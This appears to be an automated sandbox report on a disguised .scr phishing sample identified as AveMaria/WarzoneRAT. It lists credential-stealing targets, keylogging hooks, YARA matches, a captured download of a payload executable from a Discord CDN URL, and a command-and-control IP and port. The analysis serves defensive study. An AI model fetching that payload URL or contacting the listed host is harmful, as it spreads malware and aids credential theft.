                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: JDownloader 2.0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: JDownloader 2.0\cfg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: JDownloader 2.0\cfg
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exe Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,33_2_0040A8C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,33_2_0040C261
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,33_2_0040C3B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,33_2_0040C419
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,33_2_00409D97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,33_2_0040C6BD
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49729 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Directory created: C:\Program Files\Microsoft DN1
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, 00000021.00000002.472145644.00000000035BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,33_2_0041154A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_00411446 FindFirstFileW,FindNextFileW,33_2_00411446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,33_2_0040955B

                  Networking

                  Source: Malware configuration extractor URLs: 91.207.102.163
                  Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global traffic HTTP traffic detected: GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: cdn.discordapp.com Connection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040290E URLDownloadToFileW,ShellExecuteW,33_2_0040290E
                  Source: Joe Sandbox View ASN Name: M247GB M247GB
                  Source: Joe Sandbox View IP Address: 91.207.102.163 91.207.102.163
                  Source: Joe Sandbox View IP Address: 162.159.135.233 162.159.135.233
                  Source: global traffic TCP traffic: 192.168.2.4:49742 -> 91.207.102.163:26167
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cdn.discordap
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006ED9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cdn.discordapp.com
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvh
                  Source: AppLaunch.exe, 00000018.00000002.473407695.000000000A025000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E15000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordappD
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: aspnet_compiler.exe String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000026.00000002.472797955.000000000264D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
                  Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknown TCP traffic detected without corresponding DNS query: 91.207.102.163

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, RB6GPvbQr.cs .Net Code: IaIoDR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,33_2_0040813A
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310399282.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_9d4f3ffb-7
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputDatamemstr_7b309c84-a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Window created: window name: CLIPBRDWNDCLASS

                  E-Banking Fraud

                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 33_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,33_2_00413695

                  System Summary

                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: initial sampleStatic PE information: Filename: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
